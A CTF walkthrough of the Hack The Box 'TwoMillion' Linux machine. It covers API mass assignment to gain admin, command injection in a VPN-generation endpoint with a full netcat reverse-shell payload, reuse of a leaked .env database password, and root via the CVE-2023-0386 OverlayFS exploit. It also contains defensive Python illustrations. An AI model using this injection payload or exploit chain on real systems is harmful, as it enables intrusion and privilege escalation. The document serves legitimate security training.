
TwoMillion

Machine Name: TwoMillion - HTB
Level: Easy
OS: Linux

Walkthrough

Let's start with an nmap scan.


┌──(root㉿kali)-[/tmp/10.10.11.221/nmapAutomator_Results/nmap]
└─# cat Vulns_10.10.11.221.nmap 
WARNING: Duplicate port number(s) specified.  Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm).
# Nmap 7.93 scan initiated Sat Aug  5 08:38:08 2023 as: /usr/bin/nmap -sV --script vuln -p22,80,22,80 --open -oN nmap/Vulns_10.10.11.221.nmap --system-dns --stats-every 3s 10.10.11.221
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-vuln-cve2010-0738: 
|_  /jmx-console/: Authentication was not required
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug  5 08:51:41 2023 -- 1 IP address (1 host up) scanned in 812.93 seconds

After making the necessary changes to /etc/hosts, I started examining the site. I think there is a scenario here similar to the invite code you get when first joining HTB, but since it had been a long time since I joined HTB I did not remember the method, so I tried to find it from scratch myself.

I did some digging on the web page:

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# gobuster dir -u http://2million.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -r --exclude-length 1674
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://2million.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          1674
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/08/05 08:36:19 Starting gobuster in directory enumeration mode
===============================================================
/login                (Status: 200) [Size: 3704]
/register             (Status: 200) [Size: 4527]
/images               (Status: 403) [Size: 146]
/home                 (Status: 200) [Size: 64952]
/assets               (Status: 403) [Size: 146]
/css                  (Status: 403) [Size: 146]
/js                   (Status: 403) [Size: 146]
/api                  (Status: 401) [Size: 0]
/logout               (Status: 200) [Size: 64952]
/fonts                (Status: 403) [Size: 146]
/views                (Status: 200) [Size: 64952]
/VPN                  (Status: 403) [Size: 146]
/invite               (Status: 200) [Size: 3859]
/controllers          (Status: 403) [Size: 146]
Progress: 220560 / 220561 (100.00%)
===============================================================
2023/08/05 09:29:35 Finished
===============================================================

Looking at the image above, we see obfuscated JS. When I deobfuscated this code I got the result below.

From the code above we can see where to get our invite code.

It is encoded with ROT13; when decoded, I got the result below.

Then I built the request in Burp, got my invite code and created an account.

Below is the decoded form of the base64-encoded code that was returned.

RThSMVotUkNFQTQtVkxLVUgtUFBMM1E=
E8R1Z-RCEA4-VLKUH-PPL3Q

I then repeated the directory scan I had done earlier, but this time with my post-login cookie value. Starting from the top again, the paths that had previously returned 0 bytes now came back differently.

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# gobuster dir -u http://2million.htb/api/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -r --exclude-length 1674 -c "PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4"
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://2million.htb/api/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          1674
[+] Cookies:                 PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/08/05 12:10:06 Starting gobuster in directory enumeration mode
===============================================================
/v1                   (Status: 200) [Size: 800]

When I saved the response from this request to a file and then pretty-printed it with jq, I got the result below. This is the API documentation.

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# cat v1 | jq
{
  "v1": {
    "user": {
      "GET": {
        "/api/v1": "Route List",
        "/api/v1/invite/how/to/generate": "Instructions on invite code generation",
        "/api/v1/invite/generate": "Generate invite code",
        "/api/v1/invite/verify": "Verify invite code",
        "/api/v1/user/auth": "Check if user is authenticated",
        "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
        "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
        "/api/v1/user/vpn/download": "Download OVPN file"
      },
      "POST": {
        "/api/v1/user/register": "Register a new user",
        "/api/v1/user/login": "Login with existing user"
      }
    },
    "admin": {
      "GET": {
        "/api/v1/admin/auth": "Check if user is admin"
      },
      "POST": {
        "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
      },
      "PUT": {
        "/api/v1/admin/settings/update": "Update user settings"
      }
    }
  }
}

Let me briefly explain what I did with these endpoints. First, to check whether I was an admin, I sent a request to the /api/v1/admin/auth endpoint and saw that I was not; then I tried to make myself an admin through the /api/v1/admin/settings/update endpoint. This took some trial and error, guided by the server's responses.

Here are my requests and the responses, in order:

GET /api/v1/admin/auth HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:22:45 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 17

{"message":false}

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 0

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:28:12 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 53

{"status":"danger","message":"Invalid content type."}

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 0
Content-Type: application/json

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:28:28 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 56

{"status":"danger","message":"Missing parameter: email"}

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 27
Content-Type: application/json

{"email":"[email protected]"}

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:29:08 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 59

{"status":"danger","message":"Missing parameter: is_admin"}

PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 43
Content-Type: application/json

{"email":"[email protected]","is_admin":1}

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:29:37 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 41

{"id":14,"username":"admin","is_admin":1}

GET /api/v1/admin/auth HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:30:31 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 16

{"message":true}

POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 0
Content-Type: application/json

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:32:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 59

{"status":"danger","message":"Missing parameter: username"}

POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 0
Content-Type: application/json

{"username":"admin"}

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Aug 2023 16:32:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 10824

client
dev tun
proto udp
remote edge-eu-free-1.2million.htb 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</ca>
<cert>
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=UK, ST=London, L=London, O=HackTheBox, OU=VPN, CN=2million/[email protected]
        Validity
            Not Before: Aug  5 16:32:21 2023 GMT
            Not After : Aug  4 16:32:21 2024 GMT
        Subject: C=GB, ST=London, L=London, O=admin, CN=admin
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                C2:46:2C:78:9B:49:D6:44:CF:C4:91:29:B5:41:80:22:BE:61:9F:9B
            X509v3 Authority Key Identifier: 
                7A:62:DD:1D:B6:FE:4A:C8:E3:F8:9F:FA:AC:F4:15:0C:96:BA:2E:91
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Key Usage: 
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
            Netscape Comment: 
                OpenSSL Generated Certificate
    Signature Algorithm: sha256WithRSAEncryption
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
-----END PRIVATE KEY-----
</key>
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
-----END OpenVPN Static key V1-----
</tls-auth>
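The PUT /api/v1/admin/settings/update exchange above succeeds because the endpoint validates the content type and the required parameters but never checks that the caller is already an admin, so any logged-in user can write is_admin=1 onto their own account. The Python below is an added illustration (not the box's own PHP code) that models the observed behaviour next to a hardened handler; the user table, ids and e-mail addresses are constructed sample data.

```python
import copy
import json

# Constructed sample user table: one ordinary user and one real administrator.
SAMPLE_USERS = {
    14: {"id": 14, "username": "tester", "email": "tester@example.com", "is_admin": 0},
    1: {"id": 1, "username": "owner", "email": "owner@example.com", "is_admin": 1},
}


def sample_users():
    """Fresh copy of the sample table so each scenario starts from a clean state."""
    return copy.deepcopy(SAMPLE_USERS)


def vulnerable_update(users, session_uid, content_type, body):
    """Models what the walkthrough observed: the content type and the required
    parameters are checked (always answered with HTTP 200), but the caller's own
    privilege level is not, and the client-supplied is_admin is written as-is."""
    if content_type != "application/json":
        return 200, {"status": "danger", "message": "Invalid content type."}
    data = json.loads(body or "{}")
    for param in ("email", "is_admin"):
        if param not in data:
            return 200, {"status": "danger", "message": f"Missing parameter: {param}"}
    user = users[session_uid]
    user["email"] = data["email"]
    user["is_admin"] = data["is_admin"]  # mass assignment of a privilege flag
    return 200, {"id": user["id"], "username": user["username"], "is_admin": user["is_admin"]}


def hardened_update(users, session_uid, content_type, body):
    """Same endpoint with the missing controls: the caller must already be an
    admin, only an explicit allow-list of fields is accepted, types are checked,
    and is_admin is restricted to 0 or 1. Errors carry distinct status codes."""
    caller = users.get(session_uid)
    if caller is None or caller["is_admin"] != 1:
        return 403, {"status": "danger", "message": "Admin privileges required."}
    if content_type != "application/json":
        return 415, {"status": "danger", "message": "Invalid content type."}
    try:
        data = json.loads(body or "")
    except ValueError:
        return 400, {"status": "danger", "message": "Malformed JSON."}
    if not isinstance(data, dict):
        return 400, {"status": "danger", "message": "Malformed JSON."}
    allowed = {"email": str, "is_admin": int}
    unknown = sorted(set(data) - set(allowed))
    if unknown:
        return 400, {"status": "danger", "message": f"Unknown parameter: {unknown[0]}"}
    for param, typ in allowed.items():
        if param not in data:
            return 400, {"status": "danger", "message": f"Missing parameter: {param}"}
        # bool is a subclass of int in Python, so reject true/false explicitly
        if not isinstance(data[param], typ) or isinstance(data[param], bool):
            return 400, {"status": "danger", "message": f"Invalid type: {param}"}
    if data["is_admin"] not in (0, 1):
        return 400, {"status": "danger", "message": "Invalid value: is_admin"}
    caller["email"] = data["email"]
    caller["is_admin"] = data["is_admin"]
    return 200, {"id": caller["id"], "username": caller["username"], "is_admin": caller["is_admin"]}
```

Replaying the walkthrough's request sequence against vulnerable_update reproduces each server message in turn, while hardened_update stops the non-admin session at the first request with a 403.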

Based on this research I identified an RCE.

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.221 - - [05/Aug/2023 12:34:26] "GET / HTTP/1.1" 200 -
10.10.11.221 - - [05/Aug/2023 12:34:27] code 404, message File not found
10.10.11.221 - - [05/Aug/2023 12:34:27] "GET /.ovpn HTTP/1.1" 404 -

As can be seen, we can execute commands. So I got a reverse shell.

POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=kn7lob9ghnee1j94cv8u9i26s4
Connection: close
Content-Length: 40
Content-Type: application/json

{"username":"admin; rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 443 >/tmp/f"}

┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.36] from 2million.htb [10.10.11.221] 33800
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
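The shell above works because the username from the JSON body is spliced into a shell command that generates the OpenVPN profile, so a ';' in the value becomes a second command running as www-data. The Python below is an added illustration (not the box's own PHP code) of that unsafe pattern next to a hardened one: the username is checked against a strict allow-list and passed as its own argv element with no shell, and a small detection helper flags rejected values that carry shell metacharacters. The generator script path is a placeholder, since the real script is not shown in the walkthrough.

```python
import re
import subprocess

# Placeholder for the server-side profile generator (assumed path, not the box's).
VPN_GEN_SCRIPT = "/path/to/vpn-gen.sh"

# Allow-list for usernames: letters, digits, dot, underscore, hyphen, 1 to 32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

# Characters that let a value escape a single shell argument.
SHELL_METACHARS = set(";|&$`<>(){}\n")


def vulnerable_vpn_command(username):
    """Unsafe pattern: the client-controlled username is interpolated into a
    string destined for /bin/sh, so ';', '|', '$(...)' and friends become
    additional commands instead of part of the argument."""
    return f"{VPN_GEN_SCRIPT} {username}"


def hardened_vpn_argv(username):
    """Validate first, then build an argv list so the username can only ever be
    a single argument. Raises ValueError for anything outside the allow-list."""
    if not isinstance(username, str) or not USERNAME_RE.match(username):
        raise ValueError("invalid username")
    return [VPN_GEN_SCRIPT, username]


def generate_vpn_profile(username):
    """Run the generator without a shell and return its stdout as text."""
    argv = hardened_vpn_argv(username)
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout


def looks_like_injection(username):
    """Detection helper for application logs or WAF rules: true when the value
    fails the allow-list AND contains shell metacharacters. Alerting on such
    rejected values shows attempts even after the endpoint itself is fixed."""
    return not USERNAME_RE.match(username) and any(c in SHELL_METACHARS for c in username)
```

The observed payload from the request above fails hardened_vpn_argv and is flagged by looks_like_injection; a plain "admin" passes both.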

After enumerating inside, I found a .env file containing the DB password; when I tried this password for the admin user I was able to escalate privileges.


$ ls
total 56
drwxr-xr-x 10 root root 4096 Aug  5 16:40 .
drwxr-xr-x  3 root root 4096 Jun  6 10:22 ..
-rw-r--r--  1 root root   87 Jun  2 18:56 .env
-rw-r--r--  1 root root 1237 Jun  2 16:15 Database.php
-rw-r--r--  1 root root 2787 Jun  2 16:15 Router.php
drwxr-xr-x  5 root root 4096 Aug  5 16:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6 10:22 assets
drwxr-xr-x  2 root root 4096 Jun  6 10:22 controllers
drwxr-xr-x  5 root root 4096 Jun  6 10:22 css
drwxr-xr-x  2 root root 4096 Jun  6 10:22 fonts
drwxr-xr-x  2 root root 4096 Jun  6 10:22 images
-rw-r--r--  1 root root 2692 Jun  2 18:57 index.php
drwxr-xr-x  3 root root 4096 Jun  6 10:22 js
drwxr-xr-x  2 root root 4096 Jun  6 10:22 views
$ cat .enc
cat: .enc: No such file or directory
$ cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

$ su admin
Password: SuperDuperPass123
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

From here I continued over SSH.


┌──(root㉿kali)-[/tmp/10.10.11.221]
└─# ssh admin@10.10.11.221
The authenticity of host '10.10.11.221 (10.10.11.221)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.221' (ED25519) to the list of known hosts.
admin@10.10.11.221's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Aug  5 04:44:28 PM UTC 2023

  System load:           0.73876953125
  Usage of /:            90.4% of 4.82GB
  Memory usage:          14%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.221
  IPv6 address for eth0: dead:beef::250:56ff:feb9:4c06

  => / is using 90.4% of 4.82GB

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Aug  4 22:27:34 2023 from 10.10.16.18
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@2million:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@2million:~$ ls
user.txt
admin@2million:~$ cat user.txt
c5a38bb4ab887ac5fda62a4f1984ab23

After getting the first flag I tried the exploit suggester in msfconsole's post modules; it found 3 exploits but none of them worked. Then I went through the linpeas output, which mentioned that there was mail. That led me to the mail below.

admin@2million:/var/mail$ cat admin 
From: ch4p <[email protected]>
To: admin <[email protected]>
Cc: g0blin <[email protected]>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <[email protected]>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

When I researched the vulnerability in question, I found an exploit published at https://github.com/xkaneiki/CVE-2023-0386/tree/main.

After running the exploit I was able to become root.

admin@2million:/tmp/CVE-2023-0386$ ls
exp  exp.c  fuse  fuse.c  gc  getshell.c  Makefile  ovlcap  README.md  test
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
admin@2million:/tmp/CVE-2023-0386$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Aug  6 11:42 .
drwxr-xr-x 6 root   root     4096 Aug  6 11:42 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:/tmp/CVE-2023-0386# id
uid=0(root) gid=0(root) groups=0(root),1000(admin)
root@2million:/tmp/CVE-2023-0386# cd /root/
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt 
0f9bb91b0f5fd004d30cae659f9bf093
root@2million:/root# 
Category: Walkthrough
